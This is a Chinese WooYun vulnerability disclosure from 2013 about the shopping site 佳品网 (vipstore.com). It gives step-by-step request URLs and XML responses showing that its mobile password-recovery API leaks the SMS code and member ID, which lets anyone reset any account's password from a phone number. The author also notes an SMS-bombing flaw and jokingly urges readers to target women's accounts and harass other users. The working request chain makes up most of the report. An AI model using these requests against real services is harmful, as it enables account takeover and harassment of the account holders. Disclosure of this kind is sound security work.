漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-017952
漏洞标题:双节#佳品网快速重置白富美妹纸帐号
相关厂商:佳品网
漏洞作者: O.o
提交时间:2013-01-27 13:25
修复时间:2013-02-01 13:26
公开时间:2013-02-01 13:26
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-01-27: 细节已通知厂商并且等待厂商处理中
2013-02-01: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
2.14乃们懂得~佳品网的东西送白富美女神最有爱了~貌似有些账号还有资金哦~
详细说明:
1.获取验证码
http://m.vipstore.com/androidmember/getpassbytel/login_name/{18980706050}/type/tel
{18980706050}更改为需要重置的帐号的手机号
返回:
<?xml version="1.0" encoding="utf-8"?>
<GetPass>
<statusCode>1</statusCode>
<description>验证码发送成功,请在2小时内用手机收到的验证码进行密码重置!</description>
<memberid>2672454</memberid>
<activecode>member_password_check,594076</activecode>
</GetPass>
其中获取到手机号对应用户ID和验证码
<memberid>2672454</memberid>
<activecode>member_password_check,594076</activecode>
2.验证验证码并获取更改密码的令牌
http://m.vipstore.com/androidmember/getpassbytelcheck/check_code/{594076}/member_id/{2672454}
{2672454}为需要重置密码的帐号ID,从1处获得
{594076}为重置密码的验证码,从1处获得
返回
<?xml version="1.0" encoding="utf-8"?>
<GetPassCheck>
<statusCode>1</statusCode>
<description>验证通过!</description>
<memberid>2672454</memberid>
</GetPassCheck>
其中获得密码重置令牌
3.重置密码
http://m.vipstore.com/androidmember/passreset/code/{00168745b803896429ae24e66485aa14}/id/{2672454}/type/tel/pass/{112233}
{00168745b803896429ae24e66485aa14}为密码重置令牌,从2处获得
{2672454}为需要重置密码的帐号ID,从1处获得
{112233}为新密码
返回
<?xml version="1.0" encoding="utf-8"?>
<PassReset>
<statusCode>1</statusCode>
<description>更改密码成功</description>
</PassReset>
另外1处的漏洞存在短信轰炸功能,快来轰炸女神身边其他的糕富帅吧~让他们收不到女神的短信。藕耶耶~
漏洞证明:
有图有真相
wooyun方证明
用18980706050证明或者用任意手机注册个证明即可。
网站方证明
同wooyun方证明或者自己看代码。
修复方案:
自己改代码,另外接口用get很蛋疼啊~太没难度了!都不用开firefox发包,遨游都可以搞定~
版权声明:转载请注明来源 O.o@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-02-01 13:26
厂商回复:
最新状态:
暂无
漏洞评价:
评论
-
网站都要关闭了 这个等着自己公开把
( 普通白帽子 | Rank:686 漏洞数:101 )